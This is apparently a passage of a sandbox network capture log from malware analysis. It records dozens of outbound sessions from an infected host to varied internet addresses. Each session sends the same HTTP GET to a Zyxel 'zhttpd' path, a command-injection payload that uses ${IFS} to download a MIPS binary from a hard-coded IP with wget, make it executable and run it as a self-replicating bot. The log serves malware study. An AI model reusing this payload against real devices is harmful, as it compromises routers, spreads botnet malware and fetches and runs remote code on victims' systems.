                                    Jan 13, 2024 19:01:48.613406897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    196192.168.2.1354878196.131.140.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613439083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    197192.168.2.1360306153.100.239.174443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613497019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    198192.168.2.136093641.171.15.35443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613517046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    199192.168.2.13605328.81.49.187443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613671064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    200192.168.2.1352968194.236.153.246443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613698006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    201192.168.2.1335760112.132.14.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613909960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    202192.168.2.1334452148.188.135.12443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613945961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    203192.168.2.1357172113.224.35.141443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613955021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    204192.168.2.133887068.14.231.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.613991022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    205192.168.2.1341736180.96.88.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614154100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    206192.168.2.1351604220.165.39.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614185095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    207192.168.2.135566061.244.226.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614372015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    208192.168.2.135643824.80.69.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614418983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    209192.168.2.134163669.183.179.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614670992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    210192.168.2.1358004158.155.46.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614684105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    211192.168.2.1336934171.53.207.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614739895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    212192.168.2.134149284.165.21.197443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614753962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    213192.168.2.1357142120.123.186.113443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614804029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    214192.168.2.1345534129.165.70.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614928961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    215192.168.2.133980647.225.142.106443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.614970922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    216192.168.2.1338694205.208.41.108443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615457058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    217192.168.2.1356676158.218.213.87443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615495920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    218192.168.2.1356374134.175.134.72443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615518093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    219192.168.2.1338430108.232.8.253443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615689993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    220192.168.2.1336718216.126.141.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615720034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    221192.168.2.1356592169.176.193.146443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615783930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    222192.168.2.13438448.58.77.69443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615829945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    223192.168.2.134016437.73.223.83443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615883112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    224192.168.2.1349588102.208.89.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615914106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    225192.168.2.1348096201.62.206.46443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.615952015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    226192.168.2.135796823.122.47.102443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616007090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    227192.168.2.1353260216.177.128.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616024971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    228192.168.2.134046464.210.162.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616060019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    229192.168.2.1337922138.9.98.45443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616130114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    230192.168.2.1349004195.68.90.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616147995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    231192.168.2.135147247.203.23.74443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616183996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    232192.168.2.134838094.43.85.153443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616240025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    233192.168.2.134725018.19.242.176443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616249084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    234192.168.2.1360302158.212.174.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616297960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    235192.168.2.135853054.160.244.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616338015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    236192.168.2.1345430180.41.36.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616370916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    237192.168.2.134302647.191.210.193443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616413116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    238192.168.2.135952842.108.133.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616449118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    239192.168.2.134444875.109.89.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616451979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    240192.168.2.1360904146.55.251.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616518021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    241192.168.2.13585405.167.238.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616527081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    242192.168.2.1346942173.213.183.201443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616565943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    243192.168.2.1351070146.115.114.21443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616595030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    244192.168.2.133528881.5.63.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616641045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    245192.168.2.1350176157.36.116.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616667032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    246192.168.2.134492243.76.252.105443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616772890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    247192.168.2.1360876115.143.155.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616779089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    248192.168.2.134835288.87.69.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616815090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    249192.168.2.135313687.156.180.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616842985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    250192.168.2.1357510218.177.6.117443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616887093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    251192.168.2.1350798132.214.215.56443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616914988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    252192.168.2.133662697.202.171.122443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616971016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    253192.168.2.1335966163.52.126.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.616981983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    254192.168.2.1343086122.226.147.243443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.621129990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    255192.168.2.1334290206.230.174.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.621165991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    256192.168.2.1342326131.87.165.165443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.621237040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    257192.168.2.133833679.105.122.203443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:01:48.621237040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    258192.168.2.135307882.106.71.82443
                                    TimestampBytes transferredDirectionData
